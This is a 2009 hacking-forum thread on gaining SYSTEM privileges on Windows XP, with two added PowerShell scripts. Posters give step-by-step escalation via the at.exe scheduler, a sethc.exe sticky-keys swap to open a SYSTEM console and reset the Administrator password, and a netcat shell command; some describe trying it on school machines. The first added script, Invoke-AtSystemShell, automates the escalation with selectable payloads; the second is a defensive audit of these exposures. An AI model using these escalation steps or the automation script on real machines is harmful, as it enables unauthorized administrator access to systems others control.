The Sorrow (posted July 9, 2009):
This process will grant the user SYSTEM-level access and basically admin permissions.
1. Open a command prompt and type in [at XX:XX /interactive "cmd.exe"] (put here the current time plus one minute in military time). For example, if it's 10 am you would enter [at 10:01 /interactive "cmd.exe"]
2. Press Ctrl + Alt + Del to bring up Task Manager and kill "explorer.exe"
3. At 10:01 a new command prompt will open; in this new console type in [explorer]
4. Now you will notice that the Windows default visual settings are now loaded and the user name on the Start menu is now SYSTEM
This exploit can be used even on guest accounts on any Windows 2000 or higher (don't know about Vista yet). Have fun
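The four steps above as one script, added here as an example and not part of the original post or of any tool mentioned in the thread. It assumes Windows 2000/XP with at.exe and taskkill.exe on the PATH, the Schedule (Task Scheduler) service running, and a PowerShell console (2.0 shipped for XP SP3); the function name Invoke-AtSystemShell and its -Payload and -Hidden parameters are this example's own. The default payload is the cmd.exe console from the post; 'explorer.exe' is the variant digip describes later, and a netcat command line is the hidden variant Saustin mentions.

```powershell
# Added example, not from the original post. Wraps the at.exe trick from the
# thread: schedule a job one minute out, kill the user's explorer.exe, and let
# the Task Scheduler service (which runs as SYSTEM) spawn the payload.
# Assumptions: Windows 2000/XP, at.exe and taskkill.exe on PATH, run from an
# interactive console. On XP SP2+ at.exe refuses non-administrators, as the
# thread notes, so the script reports that instead of failing silently.
function Invoke-AtSystemShell {
    param(
        # 'cmd.exe' gives the console the post describes; 'explorer.exe' is the
        # later variant; 'nc.exe 127.0.0.1 555 -e cmd.exe' is the hidden one.
        [string]$Payload = 'cmd.exe',
        # /interactive is what lets the job touch the desktop; a listener-style
        # payload does not need a window, so -Hidden drops the switch.
        [switch]$Hidden
    )

    # 1. The job only fires if the Schedule service is running.
    $svc = Get-Service -Name Schedule -ErrorAction SilentlyContinue
    if (-not $svc -or $svc.Status -ne 'Running') {
        throw "Task Scheduler service (Schedule) is '$($svc.Status)'; at.exe jobs will never fire."
    }

    # 2. at.exe wants HH:MM in 24-hour time; pick the next minute boundary.
    $when   = (Get-Date).AddMinutes(1).ToString('HH:mm')
    $atArgs = @($when)
    if (-not $Hidden) { $atArgs += '/interactive' }
    $atArgs += $Payload

    $out = & at.exe @atArgs 2>&1
    # On SP2+ a limited user gets "Access is denied" here; stop and say so.
    if ($LASTEXITCODE -ne 0) {
        throw "at.exe refused the job (exit $LASTEXITCODE): $out"
    }
    Write-Host "Scheduled for ${when}: $out"

    # 3. Kill the user's shell so the SYSTEM-spawned process owns the desktop.
    #    taskkill is the command-line route when Task Manager is policy-disabled.
    if (-not $Hidden) {
        & taskkill.exe /F /IM explorer.exe | Out-Null
        Write-Host 'explorer.exe killed; when the new console appears, type: explorer'
    }

    # 4. List the queue so the job ID is known for cleanup (at.exe <id> /delete).
    & at.exe
}

# Usage: Invoke-AtSystemShell                      (console, then type explorer)
#        Invoke-AtSystemShell -Payload explorer.exe (SYSTEM desktop directly)
#        Invoke-AtSystemShell -Hidden -Payload 'nc.exe 127.0.0.1 555 -e cmd.exe'
```

The service check and the exit-code check are the two places where the thread's own reports diverge (service disabled; at.exe denied to limited users on SP2+), so the script surfaces both rather than waiting a minute for nothing to happen.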
digip (posted July 10, 2009):
Two things. #1, that is really slick and could come in handy in the future. Thanks for the tip! #2, it didn't work on my machine, but I also know why. In order for this to work, the "Task Scheduler" service has to be running, and I have it disabled by default. As soon as I started the service and ran your command it worked.
return.404 (posted July 10, 2009):
A lot of (particularly highly customized) domain controllers protect from this type of attack by disabling the Task Scheduler service. As this is quite an old exploit, it's only really relevant to older, probably personal, non-commercial systems.
The Sorrow (author, posted July 10, 2009):
Yeah, I tried it on my school's SP1 XP boxes and they have that service disabled :( but it works on a lot of the other terminals that are in our tech lab, so it has its perks.
SomethingToChatWith (posted July 10, 2009):
Wouldn't UAC protect against this? I'm amazed it's that simple. And here people are thinking the screensaver login trick in 2000 was 1337.
moonlit (posted July 10, 2009):
It got patched in XP SP2. Very old trick, probably covered elsewhere on the forum somewhere, I forget.
SomethingToChatWith (posted July 10, 2009):
You sure about that? I just got done trying it on my XP SP3 box without issue.
digip (posted July 10, 2009):
> It got patched in XP SP2. Very old trick, probably covered elsewhere on the forum somewhere, I forget.
Works on my SP3, but I had to manually start the service, as I have it set to disabled. I don't think this is a patch issue though, since services like that one run at system level anyway; if they are the one starting a process and the default user shell is gone (i.e. cancel explorer.exe before the task spawns), then cmd becomes the new shell at system user level, and since it's started by a system process, it spawns the system user when you run explorer.exe from the cmd window.
** You might even be able to... edit: Just tried it and this works as well: just skip cmd.exe and point it to explorer.exe instead, then kill explorer.exe after putting in the at command and wait for the desktop to respawn. This works even nicer, as it saved my wallpaper and custom theme. I'll have to try this now to see if that works as well. **
I noticed in Vista Task Scheduler cannot be disabled, so this might work in Vista, but I don't think you can easily kill explorer.exe in Vista like you can in XP. Don't have Vista installed on anything at the moment, so can't test that one though.
moonlit (posted July 10, 2009):
SP2+ requires you to have an admin account to begin with, thus negating the entire point. You can do it with an admin account but not with a fully patched machine and a limited account.
digip (posted July 10, 2009):
Best to disable the Task Scheduler to begin with, as I always do on my personal machines anyway.
> SP2+ requires you to have an admin account to begin with, thus negating the entire point. You can do it with an admin account but not with a fully patched machine and a limited account.
This is true, you can't run the "AT" command as a Guest or limited account. Just tried it on my machine and was denied access to the "AT" command. But I know that at work we have locked-down machines and managed desktops and such that still allow us to run the "AT" command and Task Scheduler, because we use Task Scheduler all the time to launch certain jobs during the night. I use it regularly for alerts on things I have to run at certain times of the night on the mainframe console. We don't have full admin control over the machine though, since we log on to a domain and only have certain functions we can perform on these machines. I can see that in a corporate environment where you may have little more than limited functions, but access to the "AT" command, this could be used (or abused) by anyone who knows about it to gain higher privileges on the machine, and then use it to add additional users or rights to other users.
SomethingToChatWith (posted July 10, 2009):
OK, the at command can be used by a limited account even in XP SP2. Don't believe me? Type "at /?" at the command prompt. You should see the help output for at. Now, while you can't actually "use" the at command beyond viewing the help, this is an obvious giveaway. The Task Scheduler service still runs under the SYSTEM account. With any luck, what I'm thinking is MS only patched the at command itself. Even a limited user can create tasks using the GUI. So what does this mean? I'm wondering if you can take a pre-SP2 XP version of the at command and use it? If MS only patched the at command stored on the local system, who's to say you couldn't use an older version of at from, say, a flash drive...
And yes digip, you're right on there. The way anything involving processes in Windows works is that child processes always get the amount of system access the parent process (in this case at running as the system account) has.
digip (posted July 10, 2009):
> OK, the at command can be used by a limited account even in XP SP2. Don't believe me? Type "at /?" at the command prompt. You should see the help output for at. Now, while you can't actually "use" the at command beyond viewing the help, this is an obvious giveaway. The Task Scheduler service still runs under the SYSTEM account. With any luck, what I'm thinking is MS only patched the at command itself. Even a limited user can create tasks using the GUI. So what does this mean? I'm wondering if you can take a pre-SP2 XP version of the at command and use it? If MS only patched the at command stored on the local system, who's to say you couldn't use an older version of at from, say, a flash drive...
> And yes digip, you're right on there. The way anything involving processes in Windows works is that child processes always get the amount of system access the parent process (in this case at running as the system account) has.
The AT command and the GUI do not work in a Guest account. Haven't tried a limited user account yet, but I assume they would need a group policy to grant them access to it, which is what we have at work on our domain logins, access to the at command.
pritchard9 (posted July 10, 2009):
Also, on a lot of machines I've used, which I've wanted to root (school, work etc. Not maliciously, just curious), "Task Manager" has been disabled.
digip (posted July 10, 2009):
> Also, on a lot of machines I've used, which I've wanted to root (school, work etc. Not maliciously, just curious), "Task Manager" has been disabled.
That's a good point, but have you tried the command-line versions? TASKLIST and TASKKILL
Saustin (posted July 10, 2009):
Guys, it works. The problem is that it hides the GUI. For example, if you had netcat installed onto your machine and you executed "at 12:20 'nc.exe 127.0.0.1 555 -e cmd.exe'" it would work.
sablefoxx (posted July 10, 2009):
Old trick; to my knowledge it only works on XP SP1, 2 and 3 Professional. It may work on Home but I have not tested it. You must have administrative rights to do it. It's a far cry from "any Windows machine," and I also wouldn't call it an exploit. This does NOT work on Vista or Win7, and it also does not work from XP guest accounts; I don't know what Sorrow is smoking. A while ago I helped create a program to do this automatically, takes about 1-2 mins to complete, just run it and get SYSTEM, enjoy! Download SysHack
> Also, on a lot of machines I've used, which I've wanted to root (school, work etc. Not maliciously, just curious), "Task Manager" has been disabled.
You can generally use gpedit.msc, or a 3rd-party registry editor, to re-enable Task Manager/CMD if it's been disabled. (Start > Run > type "gpedit.msc")
The Sorrow (author, posted July 11, 2009):
Well, it worked with my SP3 machine at home under a limited account; don't know if it was patched or not.
redxine (posted July 13, 2009):
If you can get Linux booted up on the machine and mount the hard drive, find C:\WINDOWS\System32\sethc.exe and rename it to something like sethc.exe.bak (just in case). Copy cmd.exe and rename the copy to sethc.exe. Reboot. At the login screen hit Shift five times, and hear the joyous music and see the black box. Notice the SYSTEM username. Profit. I use this all the time to reset "forgotten" passwords.
net user Administrator *
The Sorrow (author, posted July 13, 2009):
Wow, neat trick. Assuming it works with a live distro, I'm gonna have to try that some time.
SomethingToChatWith (posted July 14, 2009):
If you're going to boot off something, what's the point? I think Kon-Boot more than covers it.
barry99705 (posted July 14, 2009):
I think the thread title should be changed to "Gain Admin access on just-installed Windows systems with no updates installed". So far, on the five machines I've tried this on, none worked. The at command is disabled. Kon-Boot also doesn't work on them. Kon-Boot only works with local users. You need to know the name of a local user on the Windows machine. Administrator is disabled on all my work machines, and my home systems. They boot to the user name and password screen, not the stupid-ass click-a-picture-and-put-in-your-password screen.
Jonny190 (posted July 15, 2009):
Seems good under XP SP3, but Vista causes a problem by the UAC.
SomethingToChatWith (posted July 15, 2009):
edit: sorry, didn't see this post when I posted below. Delete if you want...
SomethingToChatWith (posted July 15, 2009):
> I think the thread title should be changed to "Gain Admin access on just-installed Windows systems with no updates installed". So far, on the five machines I've tried this on, none worked. The at command is disabled. Kon-Boot also doesn't work on them. Kon-Boot only works with local users. You need to know the name of a local user on the Windows machine. Administrator is disabled on all my work machines, and my home systems. They boot to the user name and password screen, not the stupid-ass click-a-picture-and-put-in-your-password screen.
Umm, can you say net user? You don't need admin access to get the usernames for the computer, and I doubt you've enabled "don't display last username", so who cares if it's not the welcome screen? Your username is already filled in by default. If you took the time to read through the thread you would have noticed patched XP machines and Vista safeguard against this escalation flaw in at by requiring you to be admin to even use it.
redxine (posted July 17, 2009):
> I think the thread title should be changed to "Gain Admin access on just-installed Windows systems with no updates installed". So far, on the five machines I've tried this on, none worked. The at command is disabled. Kon-Boot also doesn't work on them. Kon-Boot only works with local users. You need to know the name of a local user on the Windows machine. Administrator is disabled on all my work machines, and my home systems. They boot to the user name and password screen, not the stupid-ass click-a-picture-and-put-in-your-password screen.
The sethc.exe method I used has worked regardless of the Administrator account being disabled. The access to the net command is key, and the login screen's SYSTEM user account gives us that in a nice little package.
net user Administrator /active:yes
net user Administrator *
You should give it a try.
EDIT: I was going to make a video demonstrating it, but VirtualBox won't let me insert the 5 shifts for some reason. Any suggestions?
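The defender's side of the thread, added here as an example that is not part of any post: one PowerShell function that checks a host for the three exposures discussed above (the at.exe/Task Scheduler escalation, the sethc.exe swap that yields a SYSTEM console at the logon screen, and an enabled local Administrator account). It assumes it is run elevated on the machine being checked, that the Administrator account still carries its default name, and a PowerShell with WMI and ADSI available (2.0 and later); the function name Get-ThreadExposures and the property names it returns are this example's own.

```powershell
# Added example, not from the thread. Audits the host for the exposures the
# posts above describe. Assumptions: run elevated, local account named
# Administrator, PowerShell 2.0+ on Windows. Property names are this example's.
function Get-ThreadExposures {
    $sys32 = Join-Path $env:windir 'System32'

    # at.exe jobs only fire if the Schedule service runs; record state and start mode.
    $svc = Get-WmiObject Win32_Service -Filter "Name='Schedule'"

    # On XP SP2+ at.exe refuses non-administrators, so note who is asking.
    $id      = [Security.Principal.WindowsIdentity]::GetCurrent()
    $isAdmin = (New-Object Security.Principal.WindowsPrincipal $id).IsInRole(
                   [Security.Principal.WindowsBuiltInRole]::Administrator)

    # sethc.exe swap: a renamed cmd.exe hashes identically to cmd.exe, and its
    # version resource still reports the original file name Cmd.Exe.
    $sha   = [Security.Cryptography.SHA256]::Create()
    $hash  = { param($p) [BitConverter]::ToString($sha.ComputeHash([IO.File]::ReadAllBytes($p))) }
    $sethc = Join-Path $sys32 'sethc.exe'
    $cmd   = Join-Path $sys32 'cmd.exe'
    $sethcIsCmd = (& $hash $sethc) -eq (& $hash $cmd)
    $sethcOrig  = (Get-Item $sethc).VersionInfo.OriginalFilename

    # Same effect without touching the file: an IFEO Debugger value on sethc.exe.
    $ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'
    $debugger = (Get-ItemProperty -Path $ifeo -Name Debugger -ErrorAction SilentlyContinue).Debugger

    # Local Administrator: ADS_UF_ACCOUNTDISABLE (0x2) clear means the account is enabled.
    # The ADSI bind throws if the account was renamed; report $null in that case.
    $adminEnabled = $null
    try {
        $admin = [ADSI]"WinNT://$env:COMPUTERNAME/Administrator,user"
        $adminEnabled = -not ([int]$admin.InvokeGet('UserFlags') -band 0x2)
    } catch { }

    New-Object PSObject -Property @{
        ScheduleServiceState = $svc.State
        ScheduleStartMode    = $svc.StartMode
        CallerIsAdmin        = $isAdmin
        SethcMatchesCmd      = $sethcIsCmd
        SethcOriginalName    = $sethcOrig
        SethcIfeoDebugger    = $debugger
        AdministratorEnabled = $adminEnabled
    }
}

# Usage: Get-ThreadExposures | Format-List
# Anything other than ScheduleServiceState=Stopped, SethcMatchesCmd=False,
# SethcOriginalName=sethc.exe, SethcIfeoDebugger empty and
# AdministratorEnabled=False is worth a look.
```

The two sethc.exe checks are deliberately independent: the hash comparison catches the copy-and-rename from the posts above, while the version-resource check still fires if the copied cmd.exe has been padded or otherwise altered so its hash no longer matches, and the IFEO lookup covers the registry route to the same SYSTEM console. Disabling the Schedule service, as digip suggests, is the direct fix for the at.exe trick, but only where nothing on the box needs scheduled jobs.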